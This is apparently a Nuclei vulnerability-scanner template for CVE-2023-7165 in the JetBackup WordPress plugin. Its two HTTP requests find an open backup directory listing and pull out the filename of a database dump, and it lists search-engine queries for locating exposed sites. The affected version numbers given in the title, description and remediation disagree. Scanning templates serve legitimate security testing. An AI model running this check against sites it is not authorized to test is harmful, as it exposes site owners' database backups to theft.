id: CVE-2023-7165 info: name: JetBackup <= 2.0.9.7 - Sensitive Information Exposure via Directory Listing author: pussycat0x severity: high description: | JetBackup WordPress plugin <= 2.0.9.9 does not use index files to prevent directory listing in certain configurations, letting malicious actors leak backup files, exploit requires access to the web server. impact: | Attackers can access and leak sensitive backup files, potentially leading to data exposure and security breaches. remediation: | Update to version 2.0.9.9 or later that implements index files to prevent directory listing. reference: - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/backup/jetbackup-wp-backup-migrate-restore-2097-sensitive-information-exposure-via-directory-listing - https://wpscan.com/vulnerability/ad1ef4c5-60c1-4729-81dd-f626aa0ce3fe/ - https://plugins.trac.wordpress.org/changeset/3016772/backup classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2023-7165 cwe-id: CWE-548 cpe: cpe:2.3:a:developer177:jetbackup:*:*:*:*:*:wordpress:*:* epss-score: 0.01915 epss-percentile: 0.77323 metadata: verified: true max-request: 2 vendor: jetbackup product: jetbackup framework: wordpress publicwww-query: "/wp-content/plugins/backup/" fofa-query: body="/wp-content/plugins/backup/" google-query: inurl:"/wp-content/uploads/jetbackup/" shodan-query: http.html:"/wp-content/plugins/backup/" tags: cve,cve2023,wordpress,wp-plugin,jetbackup,wp,unauth flow: http(1) && http(2) http: - method: GET path: - "{{BaseURL}}/wp-content/uploads/jetbackup/" host-redirects: true max-redirects: 2 matchers-condition: and matchers: - type: dsl dsl: - 'status_code == 200' - 'contains_all(body, "Index of","jetbackup")' condition: and internal: true extractors: - type: regex name: folder_name part: body group: 1 regex: - 'href="([^"]*_D\d{14}[^"]*)/"' internal: true - method: GET path: - "{{BaseURL}}/wp-content/uploads/jetbackup/{{folder_name}}/" host-redirects: true max-redirects: 2 matchers: - type: dsl dsl: - 'contains(body, ".sgbp")' - 'status_code == 200' condition: and extractors: - type: regex name: database_dump part: body group: 1 regex: - 'href="([^"]+_database\.sql)"' internal: true # digest: 4a0a0047304502202112b401e18376ffe8f5592239b9c89f1e40501d5719df7ffe68b8eabbfb0526022100dd63e36ee2a465f2ad69eec59cdc21e3a6a2e3242f5d29229db0991f547e3c71:922c64590222798bb761d5b6d8e72950